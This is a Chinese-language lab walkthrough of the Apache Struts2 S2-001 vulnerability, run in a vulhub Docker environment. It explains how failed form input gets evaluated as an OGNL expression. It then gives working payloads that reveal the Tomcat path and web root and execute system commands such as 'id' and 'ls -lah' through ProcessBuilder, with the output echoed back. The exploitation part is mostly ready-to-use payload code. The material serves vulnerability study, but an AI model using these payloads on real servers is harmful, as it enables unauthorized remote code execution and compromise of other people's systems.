漏洞原理
由于用户提交表单数据并且验证失败时,后端会将用户先前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据当中,在真实的测试环境中,遇到注册或登录界面,存在提交数据失败情况,则后端会返回之前提交的数据信息,若后端使用%{value}对提交的数据执行了OGNL表达式解析,那么可以利用这点,直接构造payload进行远程代码执行操作.
漏洞环境
#使用vulhub进行漏洞演示
/vulhub-master/struts2/s2-001
docker-compose build
docker-compose up -d
http://xxx.xxx.xxx.xxx:8080
漏洞利用
之前提到的OGNL表达式%{value},我们可以利用其中的value值来进行相关操作,验证漏洞是否存在,将值输入后submit
username:%{8*8}
password:%{7+2}
注意看,%{ }中的值进行了解析运算,这说明后端将提交的错误数据进行了相应的OGNL表达式解析操作,并且填充到了对应的表单数据当中,
利用这一点,我们可以进行进一步的操作.
获取tomcat绝对路径
%{"tomcatDir{"+@java.lang.System@getProperty("user.dir")+"}"}
获取网站根目录
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
将构造好的payload放至输入框submit后,直接解析显示了网站根目录信息
命令执行
命令执行的参数语句:new java.lang.String[]{"id"},{ }中的值为执行命令
#获取id值
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"id"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
若命令需要携带参数执行时,因为存在空格的原因,需要进行语句的组合运行
#列出当前目录下的文件
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls","-lah"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
≈≈≈≈≈结语≈≈≈≈≈
君子不器,用成长性思维终身学习